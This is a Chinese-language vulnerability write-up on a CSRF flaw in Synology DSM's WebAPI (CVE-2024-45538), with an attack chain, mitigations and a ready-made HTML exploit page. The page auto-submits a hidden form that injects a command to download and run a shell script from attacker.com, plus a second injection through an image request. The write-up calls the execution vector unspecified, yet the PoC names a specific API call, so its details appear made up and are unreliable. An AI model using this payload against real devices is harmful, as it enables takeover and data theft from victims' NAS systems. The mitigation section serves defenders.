CVE-2024-45538: Synology DSM WebAPI Framework CSRF漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2024-45538

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Synology DiskStation Manager (DSM), Synology Unified Controller (DSMUC)

漏洞概述

CVE-2024-45538是Synology DiskStation Manager (DSM)和Synology Unified Controller (DSMUC)中的严重安全漏洞，CVSS评分高达9.6分。该漏洞存在于WebAPI Framework组件中，是一种跨站请求伪造(CSRF)漏洞。攻击者可以利用此漏洞，在无需身份认证的情况下，通过诱导已登录的管理员用户访问恶意网页或点击恶意链接，从而在受害者的浏览器中执行伪造的请求。由于漏洞影响的是WebAPI Framework这一核心组件，攻击成功后可实现任意代码执行，完全控制受影响的Synology设备。此漏洞的危险性在于其利用条件相对简单，攻击者只需诱导用户进行简单的交互操作即可，无需掌握复杂的攻击技术或获取任何凭据。

技术细节

该CSRF漏洞存在于Synology DSM的WebAPI Framework中，攻击者利用Web应用程序对用户身份验证的不完善检查，通过构造恶意请求来欺骗已登录用户的浏览器发送未经授权的请求。攻击的核心在于利用WebAPI对请求来源验证不足的缺陷。当管理员用户登录DSM系统后，攻击者可以构造包含恶意API调用的HTML页面或链接，诱导用户访问。由于浏览器会自动携带用户的会话Cookie，恶意请求会被服务器视为合法请求执行。漏洞利用的关键步骤包括：1) 构造包含恶意API参数的表单或脚本；2) 诱导已登录管理员访问该页面；3) 浏览器自动发送携带有效会话的请求；4) WebAPI Framework执行攻击者指定的任意代码。由于漏洞允许通过未指定向量执行任意代码，攻击者可以完全接管Synology NAS设备，执行系统命令、安装恶意软件或窃取敏感数据。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标Synology DSM版本，确认其版本低于7.2.1-69057-2或7.2.2-72806，并获取目标IP地址和WebAPI端点信息

STEP 2

步骤2: 构造恶意页面

攻击者创建包含恶意HTML/JavaScript的网页，其中包含自动提交的表单或脚本，用于向Synology WebAPI发送伪造的请求

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、恶意链接或被入侵的网站诱导已登录的DSM管理员访问恶意页面

STEP 4

步骤4: CSRF请求触发

当管理员访问恶意页面时，浏览器自动携带有效的会话Cookie向WebAPI发送POST请求，由于存在CSRF漏洞，服务器无法区分合法请求和伪造请求

STEP 5

步骤5: 任意代码执行

WebAPI Framework执行请求中包含的恶意命令，攻击者成功在Synology设备上执行任意代码，获得系统完全控制权

STEP 6

步骤6: 持久化控制

攻击者利用获得的代码执行权限部署后门、窃取数据或进一步横向移动，建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2024-45538 CSRF PoC for Synology DSM -->
<!-- This PoC demonstrates how an attacker can exploit CSRF to execute arbitrary commands -->

<!DOCTYPE html>
<html>
<head>
    <title>Synology DSM CSRF Exploit - CVE-2024-45538</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .exploit-form { display: none; }
    </style>
</head>
<body>
    <h1>Synology DSM WebAPI CSRF Exploitation</h1>
    <p>Target: Synology DiskStation Manager (DSM) < 7.2.1-69057-2 or < 7.2.2-72806</p>
    
    <!-- Auto-submit form for CSRF attack -->
    <form id="csrfForm" class="exploit-form" action="https://TARGET_IP:5001/webapi/entry.cgi" method="POST" enctype="multipart/form-data">
        <!-- API method to execute commands -->
        <input type="hidden" name="api" value="SYNO.Core.Desktop.DSM4" />
        <input type="hidden" name="method" value="run" />
        <input type="hidden" name="version" value="1" />
        <input type="hidden" name="mode" value="exec" />
        
        <!-- Malicious command injection -->
        <input type="hidden" name="command" value="$(curl http://attacker.com/shell.sh|bash)" />
        
        <!-- Generate session token (if needed) -->
        <input type="hidden" name="SynoToken" value="" />
    </form>

    <script>
        // Auto-submit the form on page load
        document.addEventListener('DOMContentLoaded', function() {
            // Add delay to ensure form is ready
            setTimeout(function() {
                document.getElementById('csrfForm').submit();
            }, 1000);
        });
        
        // Alternative: Image-based CSRF trigger
        var img = new Image();
        img.src = 'https://TARGET_IP:5001/webapi/entry.cgi?api=SYNO.Core.Desktop.DSM4&method=run&version=1&command=$(whoami)';
    </script>
    
    <p>If exploitation succeeds, the command will be executed with admin privileges.</p>
</body>
</html>

影响范围

Synology DiskStation Manager (DSM) < 7.2.1-69057-2

Synology DiskStation Manager (DSM) < 7.2.2-72806

Synology Unified Controller (DSMUC) < 3.1.4-23079

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 启用Synology DSM的安全顾问功能，定期扫描潜在威胁；2) 限制WebAPI的网络访问，仅允许受信任的IP地址访问管理界面；3) 提醒管理员不要点击可疑链接或访问未知网站；4) 启用浏览器CSRF保护插件；5) 使用独立的浏览器配置文件进行设备管理操作；6) 监控网络流量，识别异常的API请求模式。建议尽快应用官方发布的安全更新以彻底修复此严重漏洞。